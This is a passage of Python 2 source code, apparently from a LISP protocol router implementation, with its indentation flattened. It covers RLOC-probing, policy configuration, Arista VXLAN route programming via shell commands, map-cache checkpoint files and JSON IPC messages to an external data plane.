# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr = red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reinstall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we register them
# unconditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if the RTR address is in the RTR list the lisp-itr process learned
# from the map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc, source, port, nonce, hop_count, ttl):
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr and rloc.translated_port != 0 and
rloc.translated_port != port): continue
rloc.process_rloc_probe_reply(nonce, eid, group, hop_count, ttl)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endfor
return(count)
#enddef
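#
# Worked example: two static database-mappings plus one dynamic-EID-
# configured mapping with three discovered dynamic-EIDs count as 2 + 3 = 5
# registration entries, plus any entries contributed by eid.iid_list.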
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
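#
# For example, with hypothetical MAC strings:
#
#   lisp_format_macs("0050b6112233", "0050b6445566")
#
# returns "0050-b611-2233 -> 0050-b644-5566".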
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
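#
# For example, a packet buffer starting with "printer3\0..." (hypothetical
# name) returns the buffer positioned past the null byte and the string
# "printer3".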
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of 4-tuples whose last element
# is a lisp_packet; the first three elements are passed to print_flow(). This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
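#
# A hypothetical lisp.config clause this command table would govern (a
# sketch; the exact file syntax is defined by the config parser, not here):
#
#   lisp policy {
#       policy-name = drop-at-night
#       match {
#           instance-id = 1000
#           source-eid = 10.0.0.0/8
#       }
#       set-action = drop
#   }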
#
# lisp_send_to_arista
#
# Send supplied CLI command to an Arista switch so the hardware can be
# configured via its CLI.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address and associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configured with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
# The octet strings must be converted to integers for hex conversion.
octet1 = lisp_hex_string(int(rloc_octets[1])).zfill(2)
octet2 = lisp_hex_string(int(rloc_octets[2])).zfill(2)
octet3 = lisp_hex_string(int(rloc_octets[3])).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
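#
# Worked example of the derivation above, with a hypothetical VTEP: for
# RLOC 10.11.12.13, octets 11/12/13 become hex 0b/0c/0d, so the kernel ARP
# entry gets MAC 00:00:00:0b:0c:0d and Arista gets 0000.000b.0c0d.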
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulate it with a source-port of
# 4341 and a destination address and port that was translated by the NAT.
# That information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default route in an
# array and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
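#
# For example, with hypothetical addresses, the call:
#
#   lisp_install_host_route("192.0.2.1", "10.0.0.254", True)
#
# shells out to "ip route add 192.0.2.1/32 via 10.0.0.254".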
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
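#
# A hypothetical checkpoint line in the format described above:
#
#   [1000]10.0.0.0/8 rloc 192.0.2.1 1 50, 192.0.2.2 1 50
#
# or, for an entry with no RLOCs and the native-forward action:
#
#   [1000]10.0.0.0/8 rloc native-forward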
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Write a JSON-encoded IPC record to the lisp-ipc-data-plane named socket.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_list has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
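#
# For example, with hypothetical key strings, passing ekey "a1b2",
# ikey "c3d4", and key_type "decrypt-key" yields:
#
#   entry["keys"] = [{ "key-id" : "1", "decrypt-key" : "a1b2",
#       "icv-key" : "c3d4" }]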
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write the database-mappings to the ipc-data-plane
# socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-itr process, write the interface instance-IDs to the
# ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
